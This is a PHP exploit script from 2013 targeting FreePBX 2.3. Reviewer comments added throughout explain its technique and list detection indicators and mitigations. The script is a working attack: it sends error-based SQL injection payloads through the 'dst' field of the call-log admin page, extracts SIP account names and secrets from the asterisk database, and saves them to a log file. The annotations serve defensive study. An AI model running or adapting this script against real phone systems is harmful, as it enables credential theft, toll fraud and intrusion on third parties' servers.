i-Hmx

FreePBX , Extension Dump Exploit

Apr 27th, 2013
  1. <?
  2. /*
  3. + Application : FreePBX => 2.3
  4. | By Faris , AKA i-Hmx
  5. | n0p1337@gmail.com
  6. + sec4ever.com , 1337s.cc
  7. */
  // Reviewer annotations (defensive reading of this script).
  //
  // What it does: asks for a base URL on STDIN, then sends up to ten pairs of
  // POST requests whose `dst` form field carries a SQL fragment. Each pair
  // reads one row from `asterisk`.sip: first the `id` of a keyword='account'
  // row, then the `data` of a keyword='secret' row.
  //
  // Technique visible in the payload: a count(*) / concat(...) /
  // floor(rand(0)*2) / GROUP BY construct over information_schema.tables,
  // with the selected value wrapped between 0x666172736177793e3e
  // ("farsawy>>") and 0x3c3c ("<<"). This pattern leaks data through the text
  // of a database error, so it presumably depends on the page echoing MySQL
  // errors back to the client -- confirm against the affected version.
  //
  // Detection: look in web and WAF logs for POSTs to /admin/cdr/call-log.php
  // whose body has a `dst` value containing a quote, `information_schema`,
  // `floor(rand(0)*2)` or the hex marker above. Responses containing
  // "farsawy>>" are a further indicator.
  //
  // Mitigation: the page names only "FreePBX => 2.3" and cites no advisory id
  // or fixed release, so take the fixed version from the vendor's advisories.
  // Independent of patching: keep /admin reachable only from management
  // networks, bind `dst` as a query parameter instead of concatenating it,
  // suppress database error output, and rotate SIP secrets if requests like
  // the above appear in logs.
  print "\r\n";
  print "+-------------------------------------------+\n";
  print "|              FreePBX => 2.3               |\n";
  print "|      Extenstion Dumping Exploitation      |\n";
  print "|                  By i-Hmx                 |\n";
  print "|             n0p1337@gmail.com             |\n";
  print "+-------------------------------------------+\n";
  echo "| Enter Targer < https://ip > # ";
  // Base URL as typed by the operator; it is used unvalidated in every request.
  $ip=trim(fgets(STDIN));
  // Host label for the log filename: scheme prefixes and every "/" are removed.
  $host=str_replace("/","",str_replace("http://","",str_replace("https://","",$ip)));
  // Results are appended ("ab") to <host>.log in the working directory, so
  // recovered credentials end up on disk in clear text.
  $fafile=fopen("$host.log","ab");
  fwrite($fafile,"[+] FreePBX Extension Dump Result\r\n[+] By i-Hmx\r\n[+] n0p1337@gmail.com\r\n\n");
  echo "\n\n[+] Attacking $host\n\n";
  // $f is interpolated as the LIMIT offset, so at most rows 0..9 are requested.
  // Nothing stops the loop early when a response carries no marker.
  for($f=0;$f<10;$f++)
  {
  // Request 1: `id` column of the $f-th keyword='account' row.
  $uzdata=faget("$ip/admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0","posted=1&current_page=0&Period=Month&fromstatsmonth=2013-02&tostatsmonth=2013-02&fromstatsday_sday=01&fromstatsmonth_sday=2013-02&tostatsday_sday=01&tostatsmonth_sday=2013-02&dst=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x666172736177793e3e%2Cid%2C0x3c3c%29+FROM%60asterisk%60.sip+where+%60keyword%60%3D%27account%27+LIMIT+$f"."%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+%271%27%3D%271&dsttype=1&src=&srctype=1&channel=&duration1=&duration1type=1&duration2=&image16.x=0&image16.y=0&resulttype=min");
  // The value sits between the "farsawy>>" and "<<" markers in the response.
  $user=kastr($uzdata,"farsawy>>","<<");
  echo "   + Username : $user\n";
  fwrite($fafile,"   + Username : $user\r\n");
  // Request 2: `data` column of the $f-th keyword='secret' row. The URL here
  // has a double slash ("$ip//admin"), unlike request 1.
  $pwdata=faget("$ip//admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0","posted=1&current_page=0&Period=Month&fromstatsmonth=2013-02&tostatsmonth=2013-02&fromstatsday_sday=01&fromstatsmonth_sday=2013-02&tostatsday_sday=01&tostatsmonth_sday=2013-02&dst=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x666172736177793e3e%2Cdata%2C0x3c3c%29+FROM%60asterisk%60.sip+where+%60keyword%60%3D%27secret%27+LIMIT+$f"."%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+%271%27%3D%271&dsttype=1&src=&srctype=1&channel=&duration1=&duration1type=1&duration2=&image16.x=0&image16.y=0&resulttype=min");
  $pass=kastr($pwdata,"farsawy>>","<<");
  echo "   + Password : $pass\n\n";
  fwrite($fafile,"   + Password : $pass\r\n\n");
  }
  /**
   * Send one HTTP POST with cURL and return the raw response body.
   *
   * Notes for readers of captured traffic and logs:
   *  - "/admin/cdr/call-comp.php" is appended to whatever $url the caller
   *    passes. The callers on this page pass a URL that already ends in a
   *    query string, so the suffix lands inside the last query parameter
   *    rather than forming a new path.
   *  - TLS peer and host verification are both switched off, so the identity
   *    of the responding server is never checked.
   *  - The cookie file and cookie jar both point at "/", a directory.
   *  - Redirects are not followed, response headers are excluded from the
   *    returned string, and the transfer is capped at 5 seconds.
   *
   * @param string $url  Request URL prefix (the suffix above is added to it).
   * @param string $post URL-encoded body; setting it makes cURL issue a POST.
   * @return string|false Response body, or false when the transfer fails.
   *                      No caller on this page checks for false.
   */
  function faget($url,$post){
      $request = curl_init();

      // Applied one at a time, in the order listed.
      $settings = array(
          CURLOPT_RETURNTRANSFER => 1,
          CURLOPT_URL            => $url."/admin/cdr/call-comp.php",
          CURLOPT_POSTFIELDS     => $post,
          CURLOPT_COOKIEFILE     => '/',
          CURLOPT_COOKIEJAR      => '/',
          CURLOPT_SSL_VERIFYPEER => false,
          CURLOPT_SSL_VERIFYHOST => 0,
          CURLOPT_FOLLOWLOCATION => 0,
          CURLOPT_TIMEOUT        => 5,
          CURLOPT_HEADER         => false,
      );
      foreach ($settings as $option => $value) {
          curl_setopt($request, $option, $value);
      }

      $response = curl_exec($request);
      curl_close($request);

      return $response;
  }
  /**
   * Return the text found between the first $start marker and the next $end
   * marker in $string, or "" when $start does not occur.
   *
   * The haystack is padded with one leading space so that a marker at the
   * very beginning is reported at offset 1. This lets the single falsy check
   * below mean "not found".
   *
   * NOTE: there is no check that $end was found. If it is missing, the
   * computed length is negative and substr() trims that many characters from
   * the end of the padded string instead of returning "".
   *
   * @param string $string Text to search.
   * @param string $start  Opening marker.
   * @param string $end    Closing marker.
   * @return string
   */
  function kastr($string, $start, $end){
      $padded = " ".$string;

      $markerAt = strpos($padded, $start);
      if (!$markerAt) {
          return "";
      }

      $from  = $markerAt + strlen($start);
      $until = strpos($padded, $end, $from);

      return substr($padded, $from, $until - $from);
  }
  56. ?>